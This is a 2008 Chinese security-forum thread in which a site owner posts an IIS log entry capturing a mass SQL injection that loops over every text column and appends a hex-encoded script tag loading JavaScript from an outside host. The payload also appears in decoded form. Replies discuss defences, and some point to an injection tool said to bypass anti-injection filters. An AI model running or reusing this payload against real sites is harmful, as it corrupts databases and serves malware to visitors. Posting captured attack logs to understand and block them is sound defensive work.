【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [讨论]最近流行的数据库挂马方式讨论? [打印本页]

作者: s37su37 时间: 2008-7-21 00:18 标题: [讨论]最近流行的数据库挂马方式讨论?

[讨论]最近流行的数据库挂马方式讨论?
很多站被黑.挂了
0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D
这么一句,大家可以google上下,

还原</title>"><scrip</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!

我抓的IIS的日志
---------- EX080518.LOG
2008-05-18 00:02:13 W3SVC337328992 125.76.230.26 GET /co/mb/pdview.asp pdid=59294;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 211.99.31.176 Mozilla/4.0 200 0 1236

很奇怪,为什么加了防注脚本,对这些危险的字符都过滤了,而且自己也测试了无法成功, 这个是怎么插入的,?

作者: dahuzi3938 时间: 2008-7-21 00:18

我也想知道用什么办法解决,不过一般都是把注入点找出来,然后sql限制比较好
帖子2 精华0 积分2 阅读权限40 在线时间1 小时注册时间2008-6-2 最后登录2008-7-12 查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

憶楓

晶莹剔透§烈日灼然

作者: TOABY 时间: 2008-7-21 00:18

最近好象出了新的饿注入软件可以突破防注入程序
管中窥豹注入工具 http://gzkb.goomoo.cn

你们可以去看看
帖子14 精华0 积分41 阅读权限40 在线时间4 小时注册时间2007-4-17 最后登录2008-7-18 查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

viva88

晶莹剔透§烈日灼然

作者: zhangjian950617 时间: 2008-7-21 00:18

请问哪里有管中窥豹下载呢.呵呵.
帖子2 精华0 积分2 阅读权限40 在线时间1 小时注册时间2008-6-2 最后登录2008-7-12 查看详细资料引用报告回复 TOP

风尘秀吉

晶莹剔透§烈日灼然

作者: 风筝 时间: 2008-7-21 00:18

不知道那个管中窥豹有没后门和绑马
如果没有实为大作
帖子18 精华0 积分44 阅读权限40 在线时间137 小时注册时间2008-3-5 最后登录2008-7-18 查看详细资料引用报告回复 TOP 少女暴富的隐秘（图）

fhod

运维管理组

作者: 史达比克 时间: 2008-7-21 00:18

引用:
原帖由憶楓于 2008-6-3 05:55 发表

最近好象出了新的饿注入软件可以突破防注入程序
管中窥豹注入工具 http://gzkb.goomoo.cn

你们可以去看看
在此我顺便在这里把【管中窥豹】的加密方式简单说一说：【管中窥豹】同时采取了网络验证和usb加密锁双重验证的方式。网络验证采用了多线程互相监守、多线程随即认证、动态数据包加密、反本地模拟服务器等多种技术；usb加密则把软件的重要功能放到usb加密锁中运行，没有加密锁则缺失这些功能；此外还加上数个猛壳、字符串加密、CRC校验、反脱壳等等，要破解，几乎是不可能的任务。

共享软件很容易被破解倒是真的。

我想破解版大概会在2050年上市吧。

作者：古木系统安全

牛人哇..这也太牛比了...没准哪天就让人破了处

帖子899 精华16 积分6857 阅读权限150 性别男在线时间534 小时注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料引用报告回复 TOP 少女暴富的隐秘（图）

攻击者

晶莹剔透§烈日灼然

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)